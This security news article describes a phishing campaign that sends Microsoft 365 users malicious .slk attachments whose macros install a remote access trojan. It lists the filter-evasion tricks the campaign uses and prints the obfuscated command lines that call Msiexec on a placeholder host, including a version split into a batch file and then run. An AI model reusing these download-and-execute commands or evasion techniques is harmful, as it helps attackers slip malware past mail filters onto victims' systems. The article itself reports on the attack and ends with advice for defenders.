Hackers Extensively Attacking Microsoft 365 Customers Using Malicious .slk Files
Hackers are using a new attack method that bypasses both Microsoft's 365 default security (EOP) and advanced security (ATP) capabilities.
The attack campaign specifically designed to bypass Microsoft 365 uses a malicious.slk attachment that contains a macro embedded for downloading and installing a remote access trojan.
The attack was detected by Avanan's Security Analysts, according to analysts, "At the time of writing, Microsoft 365 is still vulnerable and the attack is still being widely used against Microsoft 365 customers."
Microsoft 365 Targeted Customers
"Symbolic Link" (SLK) is a text-based spreadsheet format, an alternative file format to XLSX. It is very rare for anyone to receive SLK files.
If you have the files received in your inbox, you are likely to be targeted by Remote Access Trojan malware that has been upgraded to bypass Advanced Threat Protection.
"The attack is specifically targeted at Microsoft's 365 accounts and has been isolated to a small number of organizations until recently," says Avanan.
Attackers use highly customized emails to attack their targets, are highly customized, and use the most relevant organization and the targeted individual.
Following are the obfuscation techniques used to bypass ATP
- The attack was sent from hundreds of free Hotmail accounts
- The macro script includes ‘^’ characters to confuse ATP filters.
- The URL was split in two so that ATP would not read it as a web link,
- The hosting server became active after the email was sent so it seemed benign if sandboxed by ATP,
- The hosting server only responded to “Windows Installer” user agents, ignoring other queries.
- The email found to be sent from thousands of Hotmail email address, attackers use it as an advantage to bypass security filters.
The macro script also includes escape characters to confuse ATP filters
M^s^ie^xec /ih^tt^p^:^/^/malicious-site.com/install.php ^/q
Also to confuse ATP the attackers split the URL into two macros
set /p=””M^s^ie^xec /ih^tt^p^:^/^/malicious-sit”” > JBfoT.bat
set /p=””e.com/install.php ^/q”” >> JBfoT.bat & JBfoT.bat
The malicious SLK file runs two to create a malicious install script that install software based on commands provided by attackers.
Users are recommended configure your Office 365 account to reject files SLK files as they are relatively rare.